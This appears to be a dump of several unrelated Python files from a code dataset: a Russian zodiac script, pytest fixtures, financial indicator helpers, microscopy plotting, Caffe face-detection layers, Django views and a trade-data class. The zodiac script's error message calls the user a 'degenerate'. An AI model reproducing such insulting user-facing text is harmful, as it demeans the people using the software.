and month == 5) or (day <= 20 and month == 6):\r\n print(\"Ты - близнец!\")\r\n elif (day >= 21 and month == 6) or (day <= 22 and month == 7):\r\n print(\"Ты - рак!\")\r\n elif (day >= 23 and month == 7) or (day <= 22 and month == 8):\r\n print(\"Ты - лев!\")\r\n elif (day >= 23 and month == 8) or (day <= 22 and month == 9):\r\n print(\"Ты - дева!\")\r\n elif (day >= 23 and month == 9) or (day <= 22 and month == 10):\r\n print(\"Ты - весы!\")\r\n elif (day >= 23 and month == 10) or (day <= 21 and month == 11):\r\n print(\"Ты - скорпион!\")\r\n elif (day >= 22 and month == 11) or (day <= 21 and month == 12):\r\n print(\"Ты - стрелец!\")\r\n elif (day >= 22 and month == 12) or (day <= 19 and month == 1):\r\n print(\"Ты - козерог!\")\r\n elif (day >= 20 and month == 1) or (day <= 18 and month == 2):\r\n print(\"Ты - водолей!\")\r\n elif (day >= 19 and month == 2) or (day <= 20 and month == 3):\r\n print(\"Ты - рыба!\")\r\n\r\n if year in range(1900, 2044):\r\n if (year - 1900) % 12 == 0:\r\n print(\"Вы родились в год крысы!\")\r\n elif (year - 1900) % 12 == 1:\r\n print(\"Вы родились в год быка!\")\r\n elif (year - 1900) % 12 == 2:\r\n print(\"Вы родились в год тигра!\")\r\n elif (year - 1900) % 12 == 3:\r\n print(\"Вы родились в год кота или кролика!\")\r\n elif (year - 1900) % 12 == 4:\r\n print(\"Вы родились в год дракона!\")\r\n elif (year - 1900) % 12 == 5:\r\n print(\"Вы родились в год змеи!\")\r\n elif (year - 1900) % 12 == 6:\r\n print(\"Вы родились в год лошади!\")\r\n elif (year - 1900) % 12 == 7:\r\n print(\"Вы родились в год овцы или козы!\")\r\n elif (year - 1900) % 12 == 8:\r\n print(\"Вы родились в год обезьяны!\")\r\n elif (year - 1900) % 12 == 9:\r\n print(\"Вы родились в год петуха!\")\r\n elif (year - 1900) % 12 == 10:\r\n print(\"Вы родились в год собаки!\")\r\n elif (year - 1900) % 12 == 11:\r\n print(\"Вы родились в год кабана или свиньи!\")\r\n else:\r\n print(\"Гороскоп на эти года неизвестен :-(\")\r\n\r\n break\r\n except ValueError:\r\n print(\"Введи в правильном формате, дегенерат!!!\")\r\n except MonthError:\r\n print(\"Введи правильный месяц\")\r\n except DayError:\r\n print(\"Введи правильный день\")","sub_path":"Pythonicus/l07/zodiac.py","file_name":"zodiac.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166416382","text":"import pytest\nfrom 
.support import ExtensionCompiler, DefaultExtensionTemplate,\\\n PythonSubprocessRunner, HPyDebugCapture\nfrom hpy.debug.leakdetector import LeakDetector\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--compiler-v\", action=\"store_true\",\n help=\"Print to stdout the commands used to invoke the compiler\")\n parser.addoption(\n \"--subprocess-v\", action=\"store_true\",\n help=\"Print to stdout the stdout and stderr of Python subprocesses\"\n \"executed via run_python_subprocess\")\n\n@pytest.fixture(scope='session')\ndef hpy_devel(request):\n from hpy.devel import HPyDevel\n return HPyDevel()\n\n@pytest.fixture(params=['cpython', 'universal', 'debug'])\ndef hpy_abi(request):\n abi = request.param\n if abi == 'debug':\n with LeakDetector():\n yield abi\n else:\n yield abi\n\n@pytest.fixture\ndef ExtensionTemplate():\n return DefaultExtensionTemplate\n\n\n@pytest.fixture\ndef compiler(request, tmpdir, hpy_devel, hpy_abi, ExtensionTemplate):\n compiler_verbose = request.config.getoption('--compiler-v')\n return ExtensionCompiler(tmpdir, hpy_devel, hpy_abi,\n compiler_verbose=compiler_verbose,\n ExtensionTemplate=ExtensionTemplate)\n\n\n@pytest.fixture(scope=\"session\")\ndef fatal_exit_code(request):\n import sys\n return {\n \"linux\": -6, # SIGABRT\n # See https://bugs.python.org/issue36116#msg336782 -- the\n # return code from abort on Windows 8+ is a stack buffer overrun.\n # :|\n \"win32\": 0xC0000409, # STATUS_STACK_BUFFER_OVERRUN\n }.get(sys.platform, -6)\n\n\n@pytest.fixture\ndef python_subprocess(request, hpy_abi):\n verbose = request.config.getoption('--subprocess-v')\n yield PythonSubprocessRunner(verbose, hpy_abi)\n\n\n@pytest.fixture()\ndef hpy_debug_capture(request, hpy_abi):\n assert hpy_abi == 'debug'\n with HPyDebugCapture() as reporter:\n yield reporter","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55370110","text":"#!/usr/bin/python3\n# coding=utf-8\nimport time\nfrom math import modf\n\n\nclass TimeHelper:\n def __init__(self):\n pass\n\n @staticmethod\n def getTime(timestamp):\n fTime = modf(timestamp / 1000.0)\n milSecond = int(fTime[0] * 1000)\n date = time.localtime(fTime[1])\n return {\n 'ms': milSecond,\n 'year': date.tm_year,\n 'mon': date.tm_mon,\n 'day': date.tm_mday,\n 'hour': date.tm_hour,\n 'min': date.tm_min,\n 'sec': date.tm_sec\n }\n\n @staticmethod\n def parseTime(date):\n t = time.strptime(date, \"%Y-%m-%d\")\n return time.mktime(t)\n\n @staticmethod\n def getStamp():\n return int(time.time() * 1000)\n\n @staticmethod\n def formatTime(timeStamp):\n fTime = modf(int(timeStamp) / 1000.0)\n date = time.gmtime(fTime[1])\n\n day = date.tm_mday > 10 and str(date.tm_mday) or \"0\" + str(date.tm_mday)\n mon = date.tm_mon > 10 and str(date.tm_mon) or \"0\" + str(date.tm_mon)\n year = str(date.tm_year)\n\n return year + \"-\" + mon + \"-\" + day\n\n\n","sub_path":"Twitter_Console/libs/TimeHelper.py","file_name":"TimeHelper.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191613637","text":"import numpy as np\nimport scipy as sp\nimport pandas as pd\n\ndef updown(ret):\n\t'show the daily up or down'\n\treturn np.sign(ret[:-1] - ret[1:])\n\ndef MA(ret, nvola):\n \"moving average\" \n length_company = len(ret)\n vola_company = [-1] * length_company#default \n if length_company < nvola:\n \treturn 
vola_company\n\n for j in range(length_company - nvola+1):\n \tvola_j=ret[j:(j + nvola)]\n \tvola_company[j] = sp.mean(vola_j)\n return vola_company\n\ndef VOL(ret,nvola):\n\t\"historical volatility\"\n\tlength_company = len(ret)\n\tvola_company = [-1] * length_company\n\tif length_company < nvola:\n\t\treturn vola_company\n\n\tfor j in range(length_company-nvola+1):\n\t\tvola_j = ret[j:(j+nvola)]\n\t\tvola_company[j] = sp.sqrt(sp.var(vola_j))\n\n\treturn vola_company\n\ndef RSI(closeprice,nRSIperiod):\n\t'require the closeprise to be pd.dataframe'\n\tlength_company=len(closeprice.values)\n\tgainloss_company= closeprice.values[:-1] - closeprice.values[1:]\n\tRSI_company = [-1] * length_company\n\tif length_company<=nRSIperiod:\n\t\treturn RSI_company\n\n\tfor j in range(length_company-nRSIperiod+1):\n\t\tgainloss_j=gainloss_company[j:(j+nRSIperiod)]\n\t\tgain_j = gainloss_j[gainloss_j >= 0]\n\t\tloss_j = gainloss_j[gainloss_j <0 ]\n\t\tavegain_j = sum(gain_j)/nRSIperiod\n\t\taveloss_j = sum(loss_j)/nRSIperiod\n\t\tRSI_company[j] = 100 - 100/(1+avegain_j/abs(aveloss_j))\n\treturn RSI_company\n\n\n\n\n\n\n\n\n\n\n","sub_path":"note/techFun.py","file_name":"techFun.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336799576","text":"from matplotlib import pyplot as plt\nfrom matplotlib import gridspec\nimport pickle\nimport numpy as np\nimport seaborn as sns\nimport os\n\nfrom matplotlib.colors import hsv_to_rgb\nfrom matplotlib.colors import rgb_to_hsv\nimport cv2\nimport PIL\nfrom PIL import ImageEnhance\n\ndef plot_od(od, label=None, col=None):\n \"\"\"Produces a line plot from a ordered dictionary as used to store training process in the Model class\n \n Parameters\n ----------\n od: OrderedDict of floats\n DECODE model\n label: str\n Label\n col: 'str'\n Color\n \"\"\" \n plt.plot(*zip(*sorted(od.items())), label = label, color = col)\n\ndef create_3d_hist(preds, z_clip=None, pix_size=5, sigma=3, contrast_fac=10, clip_density=100): \n \"\"\"Produces a coloured histogram to display 3D reconstructions.\n \n Parameters\n ----------\n preds: list\n List of localizations with columns: 'localization', 'frame', 'x', 'y', 'z'\n z_clip: list of ints\n Clips the the z values at the given lower and upper limit to control the colorrange. \n pix_size: float\n Size of the pixel (nano meter) in the reconstruction plot\n sigma:\n Size of Gaussian used for blurring\n constrast fact: float\n Contrast can be scaled with this variable if the output image is to bright/dark\n clip_density: float \n Percentile between 0 and 100. Artifacts that produce extremely dense regions in the histrogram can \n mess up the contrast scaling. This parameter can be used to exclude the brightest regions. 
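\n\n    A minimal, hypothetical usage sketch; the localization rows, the z_clip window and the file name below are invented for illustration and are not taken from a real DECODE run:\n\n    Examples\n    --------\n    >>> preds = [[0, 1, 120.0, 340.0, -250.0],\n    ...          [1, 1, 125.5, 338.2, 310.0]]\n    >>> im = create_3d_hist(preds, z_clip=[-400, 400], pix_size=5)\n    >>> im.save('reconstruction_3d.png')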
\n    \n    Returns\n    -------\n    Image: PIL image\n        Coloured histogram of 3D reconstruction\n    \"\"\" \n    # adjust colormap\n    lin_hue = np.linspace(0,1,256)\n    cmap=plt.get_cmap('jet', lut=256);\n    cmap = cmap(lin_hue)\n    cmap_hsv = rgb_to_hsv(cmap[:,:3])\n    storm_hue = cmap_hsv[:,0]\n    _,b = np.unique(storm_hue, return_index=True)\n    storm_hue = [storm_hue[index] for index in sorted(b)]\n    n_val = len(storm_hue)\n    storm_hue = np.interp(np.linspace(0,n_val,256), np.arange(n_val), storm_hue)\n    \n    x_pos = np.clip(np.array(preds)[:,2],0,np.inf)\n    y_pos = np.clip(np.array(preds)[:,3],0,np.inf)\n    z_pos = np.array(preds)[:,4]\n    \n    min_z = min(z_pos)\n    max_z = max(z_pos)\n\n    if z_clip is not None:\n        # clamp z into the requested window before normalising\n        z_pos[z_pos < z_clip[0]] = z_clip[0]\n        z_pos[z_pos > z_clip[1]] = z_clip[1]\n        zc_val = (z_pos - z_clip[0]) / (z_clip[1] - z_clip[0])\n\n    else:\n        zc_val = (z_pos - min_z) / (max_z - min_z)\n\n    z_hue = np.interp(zc_val,lin_hue,storm_hue)\n\n    nx = int((np.max(x_pos))//pix_size+1)\n    ny = int((np.max(y_pos))//pix_size+1)\n    dims = (nx,ny)\n    \n    x_vals = np.array(x_pos//pix_size, dtype='int')\n    y_vals = np.array(y_pos//pix_size, dtype='int')\n    \n    lin_idx = np.ravel_multi_index((x_vals, y_vals), dims)\n    density = np.bincount(lin_idx, weights=np.ones(len(lin_idx)), minlength=np.prod(dims)).reshape(dims)\n    density = np.clip(density,0,np.percentile(density,clip_density))\n    zsum = np.bincount(lin_idx, weights=z_hue, minlength=np.prod(dims)).reshape(dims)\n    zavg = zsum/density\n    zavg[np.isnan(zavg)]=0\n\n    hue = zavg[:,:,None]\n    sat = np.ones(density.shape)[:,:,None]\n    val = (density/np.max(density))[:,:,None]\n    sr_HSV = np.concatenate((hue,sat,val),2)\n    sr_RGB = hsv_to_rgb(sr_HSV)\n    # have to gaussian blur in rgb domain\n    sr_RGBblur = cv2.GaussianBlur(sr_RGB,(11,11),sigma/pix_size)\n    sr_HSVblur = rgb_to_hsv(sr_RGBblur)\n\n    val = sr_HSVblur[:,:,2]\n\n    sr_HSVfinal = np.concatenate((sr_HSVblur[:,:,:2],val[:,:,None]),2)\n    sr_RGBfinal = hsv_to_rgb(sr_HSVfinal)\n    \n    sr_Im = PIL.Image.fromarray(np.array(np.round(sr_RGBfinal*256), dtype='uint8'))\n    enhancer = ImageEnhance.Contrast(sr_Im)\n    sr_Im = enhancer.enhance(contrast_fac)\n\n    return sr_Im.transpose(PIL.Image.TRANSPOSE)\n\ndef create_2d_hist(preds, pix_size=5, sigma=3, contrast_fac=2, clip_density=100): \n    \"\"\"Produces a greyscale histogram to display 2D reconstructions.\n    \n    Parameters\n    ----------\n    preds: list\n        List of localizations with columns: 'localization', 'frame', 'x', 'y', 'z'\n    pix_size: float\n        Size of the pixel (nano meter) in the reconstruction plot\n    sigma:\n        Size of Gaussian used for blurring\n    contrast_fac: float\n        Contrast can be scaled with this variable if the output image is too bright/dark\n    clip_density: float\n        Percentile between 0 and 100. Artifacts that produce extremely dense regions in the histogram can\n        mess up the contrast scaling. This parameter can be used to exclude the brightest regions. 
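\n\n    A similarly hypothetical call; the localizations are made up purely to show the expected input layout:\n\n    Examples\n    --------\n    >>> preds = [[0, 1, 120.0, 340.0, 0.0], [1, 1, 125.5, 338.2, 0.0]]\n    >>> img = create_2d_hist(preds, pix_size=5)\n    >>> plt.imshow(img, cmap='gray')  # doctest: +SKIP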
\n \n Returns\n -------\n sr_blur: array\n Histogram of 2D reconstruction\n \"\"\" \n\n x_pos = np.clip(np.array(preds)[:,2],0,np.inf)\n y_pos = np.clip(np.array(preds)[:,3],0,np.inf) \n \n nx = int((np.max(x_pos))//pix_size+1)\n ny = int((np.max(y_pos))//pix_size+1)\n \n dims = (nx,ny)\n \n x_vals = np.array(x_pos//pix_size, dtype='int')\n y_vals = np.array(y_pos//pix_size, dtype='int')\n \n lin_idx = np.ravel_multi_index((x_vals, y_vals), dims)\n density = np.bincount(lin_idx, weights=np.ones(len(lin_idx)), minlength=np.prod(dims)).reshape(dims)\n density = np.clip(density,0,np.percentile(density,clip_density))\n\n val = (density/np.max(density)).T[:,:,None]\n\n sr_blur = cv2.GaussianBlur(val,(3,3),sigma/pix_size)\n sr_blur = np.clip(sr_blur, 0, sr_blur.max()/contrast_fac)\n\n return sr_blur\n","sub_path":"funcs/plot_funcs.py","file_name":"plot_funcs.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577791724","text":"import sys\nsys.path.append('/home/swang/work_space/caffe-c11/python')\nimport caffe\nimport cv2\nimport numpy as np\nimport random\nimport pickle as pickle\nimdb_exit = True\n\nrandom.seed(6)\n\n\ndef view_bar(num, total):\n rate = float(num) / total\n rate_num = int(rate * 100)\n r = '\\r[%s%s]%d%%' % (\"#\"*rate_num, \" \"*(100-rate_num), rate_num, )\n sys.stdout.write(r)\n sys.stdout.flush()\n\n################################################################################\n#########################Data Layer By Python###################################\n################################################################################\nclass Data_Layer_train(caffe.Layer):\n def setup(self, bottom, top):\n print(\"in setup\")\n self.batch_size = 384 # 64\n net_side = 12\n self.batch_loader = BatchLoader(net_side)\n top[0].reshape(self.batch_size, 3, net_side, net_side)\n top[1].reshape(self.batch_size, 1)\n top[2].reshape(self.batch_size, 4)\n top[3].reshape(self.batch_size, 10)\n\n def reshape(self, bottom, top):\n pass\n\n def forward(self, bottom, top):\n for itt in range(self.batch_size):\n im, label, roi, pts = self.batch_loader.load_next_image()\n # im, label, roi = self.batch_loader.load_next_image()\n top[0].data[itt, ...] = im\n top[1].data[itt, ...] = label\n top[2].data[itt, ...] = roi\n top[3].data[itt, ...] 
= pts\n\n def backward(self, top, propagate_down, bottom):\n pass\n\nclass BatchLoader(object):\n def __init__(self,net_side):\n\n print(\"Start Reading Train Data into Memory...\")\n if imdb_exit:\n fid = open('../prepare_data/12/12_all.imdb','rb')\n self.train_list = pickle.load(fid)\n fid.close()\n\n random.shuffle(self.train_list)\n self.cur = 0\n print(\"\\n\",str(len(self.train_list)),\" Train Data have been read into Memory...\")\n\n def load_next_image(self, ):\n if self.cur == len(self.train_list):\n self.cur = 0\n random.shuffle(self.train_list)\n cur_data = self.train_list[self.cur] # Get the image index\n im = cur_data[0]\n label = cur_data[1]\n roi = cur_data[2]\n pts = cur_data[3]\n # if label == 1 and random.choice([0,1]) == 1:\n # im = cv2.flip(im, 1)\n if random.choice([0,1]) == 1:\n if label == 1:\n im = cv2.flip(im, 1)\n roi[0] = roi[0] * -1.0\n roi[2] = roi[2] * -1.0\n # if label == 0:\n # im = cv2.flip(im, 1)\n # if label == -2:\n # im = cv2.flip(im, 1)\n # pts[0] = 1 - pts[0]\n # pts[2] = 1 - pts[2]\n # pts[4] = 1 - pts[4]\n # pts[6] = 1 - pts[6]\n # pts[8] = 1 - pts[8]\n # t = pts[0]; pts[0] = pts[2]; pts[2] = t\n # t = pts[1]; pts[1] = pts[3]; pts[3] = t\n # t = pts[6]; pts[6] = pts[8]; pts[8] = t\n # t = pts[7]; pts[7] = pts[9]; pts[9] = t\n self.cur += 1\n return im, label, roi, pts\n # return im, label, roi\n\n\n################################################################################\n#########################ROI Loss Layer By Python###############################\n################################################################################\nclass regression_Layer(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n if bottom[0].count != bottom[1].count:\n raise Exception(\"Input predict and groundTruth should have same dimension\")\n roi = bottom[1].data\n self.valid_index = np.where(roi[:,0] != -1)[0]\n self.N = len(self.valid_index)\n self.diff = np.zeros_like(bottom[0].data, dtype=np.float32)\n top[0].reshape(1)\n\n def forward(self,bottom,top):\n self.diff[...] = 0\n top[0].data[...] = 0\n if self.N != 0:\n self.diff[...] = bottom[0].data - np.array(bottom[1].data).reshape(bottom[0].data.shape)\n top[0].data[...] = np.sum(self.diff**2) / bottom[0].num\n\n\n def backward(self,top,propagate_down,bottom):\n for i in range(2):\n if not propagate_down[i] or self.N==0:\n continue\n if i == 0:\n sign = 1\n else:\n sign = -1\n bottom[i].diff[...] 
= sign * self.diff / bottom[i].num\n\n################################################################################\n#############################SendData Layer By Python###########################\n################################################################################\nclass cls_Layer_fc(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n label = bottom[1].data\n self.valid_index = np.where(label >= 0)[0]\n self.count = len(self.valid_index)\n # count_1 = len(np.where(label == -1)[0])\n # count1 = len(np.where(label == 1)[0])\n # count0 = len(np.where(label == 0)[0])\n # print(\"count-1, count1, count0\", count_1, count1, count0)\n # print(\"label\", label[self.valid_index])\n # print(\"valid_index\", self.valid_index)\n # print(\"cls valid num\", self.count)\n # print(\"len(bottom[1].data\", len(bottom[1].data))\n # top[0].reshape(len(bottom[1].data), 2,1,1)\n # top[1].reshape(len(bottom[1].data), 1)\n top[0].reshape(self.count, 2,1,1)\n top[1].reshape(self.count, 1)\n\n def forward(self,bottom,top):\n top[0].data[...][...]=0\n top[1].data[...][...]=0\n top[0].data[...] = bottom[0].data[self.valid_index]\n top[1].data[...] = bottom[1].data[self.valid_index]\n # top[0].data[0:self.count] = bottom[0].data[self.valid_index]\n # top[1].data[0:self.count] = bottom[1].data[self.valid_index]\n # top[0].data[...] = bottom[0].data[...]\n # top[1].data[...] = bottom[1].data[...]\n\n\n def backward(self,top,propagate_down,bottom):\n if propagate_down[0] and self.count!=0:\n bottom[0].diff[...]=0\n bottom[0].diff[self.valid_index]=top[0].diff[...]\n if propagate_down[1] and self.count!=0:\n bottom[1].diff[...]=0\n bottom[1].diff[self.valid_index]=top[1].diff[...]\n\nclass reg_Layer_fc(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n # label = bottom[2].data\n roi = bottom[1].data\n # self.valid_index = np.where(label != 0)[0]\n self.valid_index = np.where(roi[:,0] != -1)[0]\n self.count = len(self.valid_index)\n # print(\"label\", label)\n # print(\"valid_index\", self.valid_index)\n # print(self.count)\n top[0].reshape(self.count, 4,1,1)\n top[1].reshape(self.count, 4)\n\n def forward(self,bottom,top):\n top[0].data[...][...]=0\n top[1].data[...][...]=0\n top[0].data[...] = bottom[0].data[self.valid_index]\n top[1].data[...] = bottom[1].data[self.valid_index]\n # top[0].data[...] = bottom[0].data[...]\n # top[1].data[...] = bottom[1].data[...]\n\n\n def backward(self,top,propagate_down,bottom):\n if propagate_down[0] and self.count!=0:\n bottom[0].diff[...]=0\n bottom[0].diff[self.valid_index]=top[0].diff[...]\n if propagate_down[1] and self.count!=0:\n bottom[1].diff[...]=0\n bottom[1].diff[self.valid_index]=top[1].diff[...]\n\n\n\nclass pts_Layer_fc(caffe.Layer):\n def setup(self,bottom,top):\n if len(bottom) != 2:\n raise Exception(\"Need 2 Inputs\")\n\n def reshape(self,bottom,top):\n # label = bottom[2].data\n pts = bottom[1].data\n # self.valid_index = np.where(label != 0)[0]\n self.valid_index = np.where(pts[:,0] != -1)[0]\n self.count = len(self.valid_index)\n # print(\"pts\", pts)\n # print(\"valid_index\", self.valid_index)\n # print(self.count)\n top[0].reshape(self.count, 10,1,1)\n top[1].reshape(self.count, 10)\n\n def forward(self,bottom,top):\n top[0].data[...][...]=0\n top[1].data[...][...]=0\n top[0].data[...] = bottom[0].data[self.valid_index]\n top[1].data[...] 
= bottom[1].data[self.valid_index]\n # top[0].data[...] = bottom[0].data[...]\n # top[1].data[...] = bottom[1].data[...]\n\n\n def backward(self,top,propagate_down,bottom):\n if propagate_down[0] and self.count!=0:\n bottom[0].diff[...]=0\n bottom[0].diff[self.valid_index]=top[0].diff[...]\n if propagate_down[1] and self.count!=0:\n bottom[1].diff[...]=0\n bottom[1].diff[self.valid_index]=top[1].diff[...]","sub_path":"12net/pythonLayer.py","file_name":"pythonLayer.py","file_ext":"py","file_size_in_byte":8983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566428546","text":"from django.shortcuts import render\nfrom MainApp.models import *\nfrom django.shortcuts import redirect, render, render_to_response\nfrom django import forms\nfrom django.forms import ModelForm\n\n\nclass EmailForm(ModelForm):\n email = forms.EmailField(required=True)\n\n class Meta:\n model = Email\n\n\ndef index(request):\n msg = None\n if request.method == 'POST':\n emailForm = EmailForm(request.POST)\n if emailForm.is_valid():\n emailForm.save()\n msg = 'Thank you'\n else:\n msg = 'Please enter your actual address :)'\n\n return render(request, 'Index.html', {'msg':msg})","sub_path":"iueditor/MainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420125544","text":"# fixture and parameter have the same name\n# pylint: disable=redefined-outer-name\n\nimport pytest\n\n# WARNING: contract tests should use fully qualified imports to avoid issues\n# when being loaded by pytest\nfrom rpdk.core.contract.suite.handler_commons import test_read_failure_not_found\n\n\n@pytest.mark.read\ndef contract_read_without_create(resource_client):\n model = (\n resource_client.generate_invalid_create_example()\n ) # to allow invalid (correctly formatted primary id)\n test_read_failure_not_found(resource_client, model)\n","sub_path":"src/rpdk/core/contract/suite/handler_read.py","file_name":"handler_read.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634415755","text":"import logging\nimport tensorflow as tf\nFLAGS = tf.app.flags.FLAGS\nlogger = logging.getLogger(\"Ealiy Stop\")\n\nclass EarlyStop():\n ZERO=0\n BEST = 1\n CONTINUE = 2\n LEARNING_RATE_DECAY = 3\n STOP = -1\n\n def __init__(self,max_retry,max_learning_rate_decay):\n self.best_f1_value = 0\n self.learning_rate_counter = 0\n self.retry_counter = 0\n self.max_retry= max_retry\n self.max_learning_rate_decay = max_learning_rate_decay\n\n def decide(self,f1_value):\n\n if f1_value ==0:\n return EarlyStop.ZERO\n\n if f1_value>= self.best_f1_value:\n logger.debug(\"[早停]新F1值%f>旧F1值%f,记录最好的F1,继续训练\",f1_value,self.best_f1_value)\n # 所有的都重置\n self.retry_counter = 0\n self.learning_rate_counter = 0\n self.best_f1_value = f1_value\n return EarlyStop.BEST\n\n # 甭管怎样,先把计数器++\n self.retry_counter+=1\n logger.debug(\"[早停]新F1值%f<旧F1值%f,早停计数器:%d\", f1_value, self.best_f1_value,self.retry_counter)\n\n # 如果还没有到达最大尝试次数,那就继续\n if self.retry_counter < self.max_retry:\n logger.debug(\"[早停]早停计数器%d未达到最大尝试次数%d,继续训练\",self.retry_counter,self.max_retry)\n return EarlyStop.CONTINUE\n\n self.learning_rate_counter+=1\n logger.debug(\"[早停]早停计数器大于最大尝试次数%d,学习率Decay计数器现在是:%d\", self.max_retry,self.learning_rate_counter)\n\n # 如果还没有到达最大尝试次数,那就继续\n if self.learning_rate_counter < self.max_learning_rate_decay:\n 
self.retry_counter = 0 # 需要重置一下retry计数器\n logger.debug(\"[早停]学习率Decay计数器现在是:%d,未达到最大值%d,重置早停计数器,继续训练\",self.learning_rate_counter, self.max_learning_rate_decay)\n return EarlyStop.LEARNING_RATE_DECAY\n\n logger.debug(\"[早停]学习率Decay计数器%d、早停计数器%d都已经达到最大,退出训练\", self.retry_counter,self.learning_rate_counter)\n # 如果到达最大尝试次数,并且也到达了最大decay次数\n return EarlyStop.STOP","sub_path":"utils/early_stop.py","file_name":"early_stop.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448487119","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url\nfrom love.views import love, nice, testPost, writeNotes, readNotes, uploadFile, login, register, writeBlogs, readBlogs\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^love', love),\n url(r'^nice', nice),\n url(r'^testPost', testPost),\n url(r'^writeNotes', writeNotes),\n url(r'^readNotes', readNotes),\n url(r'^login', login),\n url(r'^register', register),\n url(r\"^uploadFile\", uploadFile),\n url(r\"^writeBlogs\", writeBlogs),\n url(r\"^readBlogs\", readBlogs),\n]\n","sub_path":"backend/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620672377","text":"# -*- coding:utf-8 -*-\n\nimport traceback\nimport pandas as pd\nfrom lib import GenConfig\nfrom .error import TradeDetailsRecordError\n\n\nclass TradeDataComposition:\n \"\"\"交易数据合成 ---\n 将历史交易数据与最新行情数据合成,比如支持计算动态移动平均线、MACD等\n \"\"\"\n # 数据文件中的字段名称\n F_OPEN = 'Open'\n F_CLOSE = 'Close'\n F_AVG = 'Avg'\n F_HIGH = 'High'\n F_LOW = 'Low'\n F_BUY = 'Buy'\n F_SELL = 'Sell'\n\n def __init__(self, datafile, logger=None):\n \"\"\"交易数据接口\n :param datafile: 数据文件名\n :param logger: 是否调试\n \"\"\"\n self.logger = logger\n self.datafile = datafile\n self.data = pd.read_csv(datafile, header=None, index_col=0)\n self.data.columns = [self.F_OPEN, self.F_CLOSE, self.F_HIGH, self.F_LOW, self.F_BUY, self.F_SELL]\n # 根据邻近性原则建立tick数据缓存区\n self.__mcache = {}\n\n def __del__(self):\n pass\n\n def M(self, date, field, count, price):\n \"\"\"计算移动平均值\n :param date: 交易日\n :param field: 字段\n :param count: 移动单位数\n :param price: 当前价\n :return:\n 参数不正确返回None,正常返回移动平均值\n \"\"\"\n try:\n return self.__mcache[date]['M'][field][count]\n except KeyError:\n ret = None\n dat = self.data[self.data.index <= date].tail(count-1)\n if count <= 1 or price <= 0:\n self.logger.error(f\"收到非法参数:count = {count}, price = {price}\")\n return ret\n elif len(dat) < count - 1:\n self.logger.error(f\"M值无效:len(dat) = {len(dat)}, count - 1 = {count - 1}\")\n return ret\n\n ret = float(sum(dat[field]) + price)/ (len(dat) + 1)\n\n if date not in self.__mcache.keys():\n # tick日期发生变化,依据邻近原则更新缓存区\n self.__mcache.clear()\n self.__mcache[date] = {}\n 
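# cache layout: self.__mcache = {date: {'M': {field: {count: value}}}};\n                # e.g. self.__mcache[date]['M']['Close'][5] would hold the cached\n                # 5-tick moving average of the Close field for that tick date\n                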
self.__mcache[date]['M'] = {}\n self.__mcache[date]['M'][field] = {}\n elif 'M' not in self.__mcache[date].keys():\n self.__mcache[date]['M'] = {}\n self.__mcache[date]['M'][field] = {}\n elif field not in self.__mcache[date]['M'].keys():\n self.__mcache[date]['M'][field] = {}\n\n self.__mcache[date]['M'][field][count] = ret\n return ret\n\n def get_field(self, date, field):\n \"\"\"获取指定交易时间指定字段值\n :param date: 交易时间\n :param field: 字段\n :return: 没有返回None,有则返回值\n \"\"\"\n try:\n dat = self.data[self.data.index == date]\n return dat[field][0]\n except IndexError:\n # 指定时间不存在\n return None\n\n def get_open(self, date):\n \"\"\"\n 获取指定交易时间开盘价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_OPEN)\n\n def get_close(self, date):\n \"\"\"获取指定交易时间收盘价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_CLOSE)\n\n def get_avg(self, date):\n \"\"\"获取指定交易时间平均价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_AVG)\n\n def get_high(self, date):\n \"\"\"获取指定交易时间最高价\n :param date: 交易时间\n :return: 没有返回None,有则返回值\n \"\"\"\n return self.get_field(date, self.F_HIGH)\n\n def get_low(self, date):\n 